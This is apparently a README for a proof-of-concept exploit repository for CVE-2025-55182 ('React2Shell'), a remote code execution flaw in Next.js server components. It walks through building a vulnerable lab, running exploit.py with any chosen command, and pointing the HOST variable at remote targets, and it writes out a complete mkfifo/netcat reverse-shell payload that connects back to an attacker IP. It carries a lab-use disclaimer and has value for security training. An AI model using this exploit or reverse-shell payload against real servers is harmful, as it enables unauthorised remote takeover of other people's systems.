## https://sploitus.com/exploit?id=F43285B2-13FE-5FF3-AF4C-FD7D5630CC58
# React2Shell CVE-2025-55182
A proof-of-concept exploit demonstrating a remote code execution vulnerability in Next.js applications through prototype pollution in the React server components rendering pipeline.
## โ ๏ธ Disclaimer
This tool is for educational and authorized testing purposes only. Unauthorized use against systems you don't own or have permission to test is illegal.
## ๐ Prerequisites
- Node.js (v16 or later)
- Python 3.6+
- netcat (for reverse shells)
- A vulnerable Next.js application (included in this repo)
## ๐ Quick Start
### Option 1: Use Pre-configured Lab
#### 1. Clone the Repository
```bash
git clone https://github.com/securifyai/React2Shell-CVE-2025-55182.git
cd React2Shell-CVE-2025-55182
```
### Option 2: Create Server from Scratch
```bash
# Create a new Next.js app with the vulnerable version
npm create next-app@15.4.7 react2shell-lab
# Accept all defaults when prompted
cd react2shell-lab
```
> **Note**: The pre-configured lab already includes the necessary vulnerable code. If creating from scratch, you'll need to manually add the vulnerable components.
### 2. Install Dependencies
```bash
cd react2shell-lab
npm install
```
### 3. Start the Vulnerable Server
In terminal 1:
```bash
npm run dev
```
The server should start on `http://localhost:3000`
## ๐ง Exploitation
### Basic Command Execution
1. The repository includes an `exploit.py` file that demonstrates the vulnerability. Edit the `COMMAND` variable in the file to your desired command:
```python
COMMAND = 'whoami' # Change this to any command you want to execute
```
2. Run the exploit:
```bash
python3 exploit.py
```
### Reverse Shell
1. Set up a netcat listener in a new terminal:
```bash
nc -nvlp 4444
```
2. Edit `exploit.py` and update the command to your reverse shell payload:
```python
COMMAND = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc YOUR_IP 4444 >/tmp/f'
```
Replace `YOUR_IP` with your local machine's IP address.
3. Run the exploit:
```bash
python3 exploit.py
```
## ๐ ๏ธ Advanced Usage
### Testing Remote Targets
Edit the `HOST` variable in the exploit script to target remote servers:
```python
HOST = 'target-ip-address' # Replace with target IP
PORT = 3000 # Default Next.js port
```
### Common Commands
- List directory contents: `ls -la`
- Get system information: `uname -a`
- Get current user: `whoami`
- Get network information: `ifconfig` or `ip a`
## ๐ Troubleshooting
- **Connection refused**: Ensure the target server is running and accessible
- **Command not found**: The target system might not have certain binaries installed
- **No output**: The command might have executed but not produced any output
## ๐ References
- [CVE-2025-55182](https://vulners.com/cve/CVE-2025-55182)
- [Next.js Security Advisories](https://github.com/vercel/next.js/security/advisories)
- [Prototype Pollution in JavaScript](https://portswigger.net/web-security/prototype-pollution)
## ๐ License
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
This version asks for user input for remote target and attacker IPs and ports. The post body (body_parts) is also trimmed down slightly in this version.
### Sources:
https://www.averlon.ai/blog/react2shell-cve-2025-55182-explained
https://tryhackme.com/room/react2shellcve202555182